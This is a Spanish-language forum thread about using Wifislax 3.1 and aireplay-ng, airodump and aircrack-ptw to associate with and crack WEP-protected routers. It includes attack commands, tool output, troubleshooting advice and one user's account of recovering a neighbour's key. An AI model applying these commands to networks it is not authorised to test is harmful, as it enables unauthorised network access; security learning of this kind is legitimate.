PD: por favor no mezcléis temas, después es un caos encontrar las cosas, Gracias.
Título: Re: Ataques y Asociaciones con Wifislax 3.1
Publicado por: elmocano1 en 06-09-2008, 21:45 (Sábado)
hola como estan soy nuevo aqui alguien me ayuda a instalar wifislax 3.1 y a usar airoscript por pm por favor quien pueda ayudarme  ya que agradesco la ayuda que me an brindado
Título: Re: Ataques y Asociaciones con Wifislax 3.1
Publicado por: drvalium en 06-09-2008, 22:15 (Sábado)
para como instalar wifislax y usar airoscript visita la zona de manuales.


un saludo
Título: Re: Ataques y Asociaciones con Wifislax 3.1
Publicado por: elmocano1 en 06-09-2008, 23:09 (Sábado)
gracias pero es  que se me hace dificil la forma de los manuales pero si puedes explicarme la forma mas facil o el manual mas facil yo tengo win xp yo corro bien el wifislax como live cd pero me gusto y lo kiero instalar
Título: Re: Ataques y Asociaciones con Wifislax 3.1
Publicado por: drvalium en 07-09-2008, 02:09 (Domingo)
si tienes dudas sobre algun manual, abre un tema nuevo en la zona de wifislax 3.1 explicando que no entiendes.

te dejo este enlace, pero por favor no continues por aquí, dudas nuevas en temas nuevos ¿ok?

https://foro.seguridadwireless.net/index.php/topic,1066.0.html

un saludo
Título: Re: Ataques y Asociaciones con Wifislax 3.1
Publicado por: Thejez-Wifi en 12-08-2009, 03:50 (Miércoles)
NO se si llegen a leerme, pero la verdad son un fanatico a la lectura, y solo basta con leer, que hay dias que no necesito preguntar, dandome cuenta que las dudas son similares y las respuestar en este foro si son las acertadas. GRACIAS y repito tal ves no lan este mensaje por que ya tiene las de 120 del ultimo mensaje
adios ^-^ >:(
Título: Re: Ataques y Asociaciones con Wifislax 3.1
Publicado por: dongato1306@hotmail.com en 09-07-2010, 22:31 (Viernes)
Muy buenas, les queria decir que soy nuevo en el foro y este tema de wifislax llego a mi gracias a un profesosr, la cosa es que me intereso mucho y quise hacer la prueba... leyendo manuales de esta pag al fin pude instalar el wifislax emulado en el vmware y tambien pude hacer que me reconozca mi antena usb realtek rt8187b con unos driver q baje del mismo manual. (las 2 cosas se me hicieron muy dificil pero con paciencia lo pude hacer!)
aqui el link: https://foro.seguridadwireless.net/manuales-de-wifislax-wifiway/wifislax-3-1-con-rt8187b/

bueno el tema es que tengo un problema parecido a el usuario q inicio el tema... la cosa q a la hora de querer asociarme hay que poner la ESSID, y MAC del que quiero asociarme antes que el mio... ejemplo:
aireplay-ng -1 30 -e ESSID -a MAC -h MACMIA wlan0

al ponerlo me aparece esto:

wifislax ~ # aireplay-ng -1 30 -e ESSID -a MACDELQUEQUIEROASOCIARME -h 00:00:00:00:00:00 wlan0
The interface MAC 00:00:00:00:00:01 doesn't match the specified MAC (-h).
        ifconfig wlan0 hw ether 00:00:00:00:00:00
21:45:39  Waiting for beacon frame (BSSID: MACDELQUEQUIEROASOCIARME)
21:45:41  Sending Authentication Request
21:45:41  Authentication successful
21:45:41  Sending Association Request
21:45:46  Sending Authentication Request
21:45:47  Authentication successful
21:45:47  Sending Association Request
21:45:52  Sending Authentication Request

(La parte purpura es mi duda, no se por que me aparece eso, en la parte roja si se dan cuenta pone exactamente la misma mac a excepcion de una sola letra que es la del final y no me aparece "association sucefull :-)" )
lei q hay que para inyectar hay que cambiar la mac pero yo no hice nada de eso, en todo caso lo habra hecho solo. Bueno como no pude asociarme quise probar con la mac q me daba y esta vez si me aparecio el "association sucefull :-) rapidamente quise inyectar en una nueva consola con el comando "aireplay-ng -3 -x600 -b MACQUEQUIEROINYECTAR -h MACMIACAMBIADA wlan0"pero me aparece lo siguiente:

Notice: got a deauth/disassoc packet. Is the source MAC associated ?
read 256165 packets (got a 4 ARP requests) , sent 75185 (packets... 29 pps)

(aclaro q espero mucho tiempo y como podran ver en la parte purpura solo envio 4 datas, y en la parte roja aparece como que se desasocio, me fije en la shell donde puse el codigo para asociarme y me aparecio esto:
 
22:20:59  Waiting for beacon frame (BSSID: MACDELQUEQUIEROASOCIARME)
22:21:00  Sending Authentication Request
22:21:00  Authentication successful
22:21:00  Sending Association Request
22:21:00  Association successful :-)
22:21:00  Got a disassociation packet!
22:21:03  Sending Authentication Request
22:21:05  Sending Authentication Request
22:21:08  Sending Authentication Request
22:21:10  Sending Authentication Request
22:21:12  Sending Authentication Request
22:21:14  Sending Authentication Request
22:21:16  Sending Authentication Request

Attack was unsuccessful. Possible reasons:

    * Perhaps MAC address filtering is enabled.
    * Check that the BSSID (-a option) is correct.
    * Try to change the number of packets (-o option).
    * The driver hasn't been patched for injection.
    * This attack sometimes fails against some APs.
    * The card is not on the same channel as the AP.
    * Injection is not supported AT ALL on HermesI,
      Centrino, ndiswrapper and a few others chipsets.
    * You're too far from the AP. Get closer, or lower
      the transmit rate (iwconfig <iface> rate 1M)

(ahi con otra duda ya que en la shield donde monitorizo las redes, en la columna station me aparece la ESSID del que quiero asocierme, y segun entiendo si aparece en la columna station se supone q ya esta asociado conmigo...)

probe tratar de inyectarme de nuevo pero no hay caso, me sigue aparecioendo ese cartel, en la parte donde tengo que capturar datas no captura nada, y en donde veo las redes aparece en la columna station... trate de muchas formas pero no hay caso... les pido su ayuda por favor.

PD: ojala lo lean, parece un poco abandonado este tema...  :(
Título: Re: Ataques y Asociaciones con Wifislax 3.1
Publicado por: drvalium en 10-07-2010, 02:29 (Sábado)
por algún motivo pierdes la asociación con el router, baja el rate a 1 mb.

y no utilices MAC falsa, en -h 00:00:00:00:00 pon tu MAC real, usar una falsa puede ser causa de que seas expulsado de la red.

por lo purpura no te preocupes, ese mensaje solo te avisa de que no habías cambiado la MAC de tu adaptador antes de iniciar el ataque.

el tema no es que esté abandonado, es que ya está todo explicado, si te lo lees entero veras que no te contesto nada que no se haya escrito en este mismo tema, por favor antes de preguntar lee, repetir siempre lo mismo es muy cansino, gracias.
Título: Re: Ataques y Asociaciones con Wifislax 3.1
Publicado por: dongato1306@hotmail.com en 10-07-2010, 20:51 (Sábado)
muchas gracias por contestar doc, bueno intente lo de bajar los rate y sigue igual, no me suben los arp, y al  trata de asociar con mi mac verdadera como que intenta por mucho tiempo pero no hay caso... despues intente con la mac falsa y ahi me agarra rapido, pero se desconecta despues de un tiempo... en una ocaccion se mantuvo perfecto, inicie el "ataque" pero no subian los ARP, creo que es la distancia pero seguire intentando, en todo caso si fallo no me queda otra que llevar el gabinete a la casa de mi vecino y probar al lado del router inalambrico (es un amigo del cole) y probar ahi, ya que como dije somos estudiantes y queremos aprender mas sobre esto.

PD: lo del tema abandonado me quedo claro
PD2: vi que mi primer pregunta, la de The interface MAC 00:00:00:00:00:01 doesn't match the specified MAC (-h).
        ifconfig wlan0 hw ether 00:00:00:00:00:00, estaba contestada, le decias que estaba inyectando, resaltando con azul lo arp pero en mi caso no subian y por eso reitere, ahora ya me quedo claro con la duda de que aun no entiendo por que con mac falsa me conecto y con la verdadera no.

PD3: espero no ser tan pesado y cualquier cosa vendre a preguntar si es que me pueden ayudar. Muchas gracias al foro y a usted doc  ;D
Título: Re: Ataques y Asociaciones con Wifislax 3.1
Publicado por: drvalium en 11-07-2010, 01:38 (Domingo)
con la duda de que aun no entiendo por que con mac falsa me conecto y con la verdadera no.

con la MAC falsa apareces como asociado pero no creo que lo estés, te lo muestra el aireplay pero dudo que hayas conseguido esa asociación por eso te acaba expulsando.

pasa algo similar cuando uno intenta conectarse usando una calve WEP incorrecta, en el airodump sales como asociado pero en verdad no se está.

las posibles causas las tienes ahí, prueba una por una.

Citar
* Perhaps MAC address filtering is enabled.
    * Check that the BSSID (-a option) is correct.
    * Try to change the number of packets (-o option).
    * The driver hasn't been patched for injection.
    * This attack sometimes fails against some APs.
    * The card is not on the same channel as the AP.
    * Injection is not supported AT ALL on HermesI,
      Centrino, ndiswrapper and a few others chipsets.
    * You're too far from the AP. Get closer, or lower
      the transmit rate (iwconfig <iface> rate 1M

lo mismo pasado por el traducctor de google: http://translate.google.es/?hl=es&tab=wT#

    * Tal vez filtrado de direcciones MAC está habilitado.
    * Compruebe que el BSSID (-una opción) es correcta.
    * Trate de cambiar el número de paquetes (-o opción).
    * El controlador no se ha modificado para inyección.
    * Este ataque a veces falla en contra de algunos puntos de acceso.
    * La tarjeta no está en el mismo canal que el AP.
    * Inyección no es compatible en absoluto en HermesI,
      Centrino, ndiswrapper y algunos otros chipsets.
    * Estas demasiado lejos de la AP. Acérquese más, o menos
      una velocidad de transmisión (1M iwconfig tasa <iface>)


saludos
Título: Re: Ataques y Asociaciones con Wifislax 3.1
Publicado por: dongato1306@hotmail.com en 15-07-2010, 05:01 (Jueves)
muchas gracias por responder drvalium le comento que intente bajar el rate a 1 M, internar de hacer la asociacion ya sea con mi mac falsa y mi mac verdadera, y aun asi no pude, despues de tanto leer vi por ahi que era mejor si lo hacia con una mac que ya se haya asociado al AP, bueno lo intente y me empezo a tirar datas, intentaba hacer la asociacion pero me desasociaba, lanzaba el -3 me dejaba de tirar datas, bueno probe al dia siguiente y de nuevo me empezo a lanzar datas, esta vez no hice ni el -1 ni el -3, deje que me suban los datas en el airodump, me fui a dormir y a la mañana cuando me fijo tenia 85.000 datas mas o menos, quize probar sacar la clave con aircrack-ptw pero no podia, tambien intente con aircrack-ng pero por mas que lo haya dejado 8 hs y haya probado mas de 200.000.000 claves no me la daba, me parecio raro ya que la clave es de 5 digitos y lei en sus comentarios que con 60.000 datas es suficiente. bueno al dia siguiente probe con otra mac que se habia asociado al AP y no me tiraba datas... pero bueno quize hacer la asociacion con este comando:
aireplay-ng -1 0 –e NombreESSID –a MACROUTER –h MACNUESTRA wlan0

Y logre la asociacion.

despues lance el -1 y me empezo a subir los datos en el airodump como loco!

me fije en aire play y efectivamente los ARP subian! no pasaron ni 15 minutos y junte alrededor de 240.000.000 datas! (me dejo de subir solo, supongo que me desasocio, no intente asociarme de nuevo porque crei que eran suficientes arp) bueno lance el aircrack-ptw y al fin saco la pass  ;D(seria el colmo si no lo hacia...)

Bueno veo los arp o datas suben dependiendo de la interfaz, AP (supongo que el de mi amigo era uno bueno xD) y muchos otros factores.

ahora me vino otro problema la antena que use para probar estas cosas no es mia y decidi comprarme una propia, compre una D-Link DWA-125 Wireless 150 USB Adapter y no puedo instalarla... solo le aviso, creare un tema nuevo haber si me pueden ayudar porque busque mucho tiempo las posibles soluciones y no hay caso... bueno me despido y muchas gracias Doc! ;D
Título: Re: Ataques y Asociaciones con Wifislax 3.1
Publicado por: drvalium en 15-07-2010, 21:38 (Jueves)
me alegra saber que vas depurando la técnica y consigues resultados.

un saludo ;)
Título: Re: manual WifiSlax sobre Windows Vista - PDF
Publicado por: shreck300 en 13-10-2010, 21:32 (Miércoles)
Buenas

Cita de: M_aqui
"The interface MAC (00:00:00:00:00:00) doesn't the especified MAC (-h)"

Usa el codigo asi:

aireplay-ng -1 30 -e ESSID -a BSSID -h 11:22:33:44:55:66 wlan0

ESSID= nombre de la red a la que te quieres asociar.

BSSID= direccion MAC router de la red a la que te quieres asociar.

este ataque solo funciona si no hay cliente asociado.

Si hay cliente utiliza directamente el ataque 3.

aireplay-ng -3 -b BSSID -h STATION

BSSID= direccion MAC router de la red  que quieres monitorizar.

STATION: direccion MAC del cliente asociado.


Mira esto: Como saber si hay cliente asociado (https://foro.seguridadwireless.net/index.php/topic,9749.msg56913.html#msg56913)


saludos




hola, soy nuevo y keria saber si ago algo mal, porque ago lo que pone aqui el amigo y no me autentifica por mas que ago el essid al ke kiero asociarme no tiene clientes asociado, lo ago asi como lo pone el drvalium pero na, asi lo ago tal cual lo pone espero ke me ayuden,gracias de antemano.
Título: Re: Ataques y Asociaciones con Wifislax 3.1
Publicado por: drvalium en 15-10-2010, 00:59 (Viernes)
eso es del segundo o tercer post del este tema, si te lo lees entero tendrás tus respuestas.

también ten en cuenta que no siempre que falla es culpa del proceso, hay routers muy difíciles de petar.


saludos